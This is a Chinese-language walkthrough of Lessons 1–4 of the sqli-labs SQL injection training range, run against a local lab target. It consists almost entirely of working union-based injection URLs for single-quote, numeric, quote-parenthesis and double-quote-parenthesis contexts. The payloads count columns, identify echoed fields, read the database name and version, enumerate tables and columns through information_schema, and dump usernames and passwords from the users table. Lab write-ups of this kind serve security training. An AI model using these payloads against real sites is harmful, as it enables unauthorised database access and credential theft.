目录
由于只能查看第一组数据,所以我们需要修改id值,让他要么远超这个数据表,要不小于0:
在知道了回显的列数是第二列和第三列,所以我们可以直接曝出数据库名和版本号:
首先打开php:
Less-1:
打开浏览器输入网址,进入靶场:
输入?id=1查询:
使用order by查询数据表的列数:
http://127.0.0.1/sqllab/less-1/?id=1' order by 4 --+
http://127.0.0.1/sqllab/less-1/?id=1' order by 3 --+
由此可得表有三列。
使用union查询:
http://127.0.0.1/sqllab/less-1/?id=1' union select 1,2,3 --+
由于只能查看第一组数据,所以我们需要修改id值,让他要么远超这个数据表,要不小于0:
http://127.0.0.1/sqllab/less-1/?id=-1' union select 1,2,3 --+
在知道了回显的列数是第二列和第三列,所以我们可以直接曝出数据库名和版本号:
http://127.0.0.1/sqllab/Less-1/?id=-1' union select 1,database(),version()--+
曝表:
http://127.0.0.1/sqllab/less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
曝字段名:
http://127.0.0.1/sqllab/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
根据查询到的结果,可以猜测username和password是账户名和密码。
获取用户名和密码:
http://127.0.0.1/sqllab/Less-1/?id=-1' union select 1,2,group_concat(username ,0x3a , password) from users--+
Less-2:
(由于L-1~L-2差不多一样,所以直接按L-1步骤)
进入靶场:
输入?id=1查询:
输入单引号,根据报错信息确定咱们输入的内容被原封不动的带入到数据库中,也可叫做数字型注入,就是,把第一题中id=1后面的单引号去掉
使用order by查询数据表的列数:
http://127.0.0.1/sqllab/less-2/?id=1 order by 5 --+
http://127.0.0.1/sqllab/less-2/?id=1 order by 4 --+
http://127.0.0.1/sqllab/less-2/?id=1 order by 3 --+
使用union查询:
http://127.0.0.1/sqllab/less-2/?id=1 union select 1,2,3 --+
曝出数据库名和版本号:
http://127.0.0.1/sqllab/Less-2/?id=-1 union select 1,database(),version()--+
曝表:
http://127.0.0.1/sqllab/less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
曝字段名:
http://127.0.0.1/sqllab/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
获取用户名和密码:
http://127.0.0.1/sqllab/Less-2/?id=-1 union select 1,2,group_concat(username ,0x3a , password) from users--+
Less-3:
进入靶场:
输入?id=1查询:
输入单引号,根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了,猜想一下咱们输入1在数据库语句中的位置,形如select … from … where id=( ‘1’) …,在第一题中id=1’的后面单引号加上)
使用order by查询数据表的列数:
http://127.0.0.1/sqllab/Less-3/?id=1') order by 5--+
http://127.0.0.1/sqllab/Less-3/?id=1') order by 4--+
http://127.0.0.1/sqllab/Less-3/?id=1') order by 3--+
使用union查询:
http://127.0.0.1/sqllab/Less-3/?id=-1') union select 1,2,3--+
曝出数据库名和版本号:
http://127.0.0.1/sqllab/Less-3/?id=-1') union select 1,database(),version()--+
曝表:
http://127.0.0.1/sqllab/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
曝字段名:
http://127.0.0.1/sqllab/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
获取用户名和密码:
http://127.0.0.1/sqllab/Less-3/?id=-1') union select 1,2,group_concat(username ,0x3a , password) from users--+
Less-4:
进入靶场:
输入?id=1查询:
输入单引号,页面无任何变化,输入双引号,页面报错,根据报错信息判断出咱们输入的内容被放到一队双引号和圆括号中,猜想一下:select … from … where id=(”1”) …,把第一题中1后面的引号换成双引号加)。
使用order by查询数据表的列数:
http://127.0.0.1/sqllab/Less-4/?id=1") order by 5--+
http://127.0.0.1/sqllab/Less-4/?id=1") order by 4--+
http://127.0.0.1/sqllab/Less-4/?id=1") order by 3--+
使用union查询:
http://127.0.0.1/sqllab/Less-4/?id=-1") union select 1,2,3--+
曝出数据库名和版本号:
http://127.0.0.1/sqllab/Less-4/?id=-1") union select 1,database(),version()--+
曝表:
http://127.0.0.1/sqllab/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+
曝字段名:
http://127.0.0.1/sqllab/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name ='users'--+
获取用户名和密码:
http://127.0.0.1/sqllab/Less-4/?id=-1") union select 1,2,group_concat(username,0x3a,password) from users --+
929
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
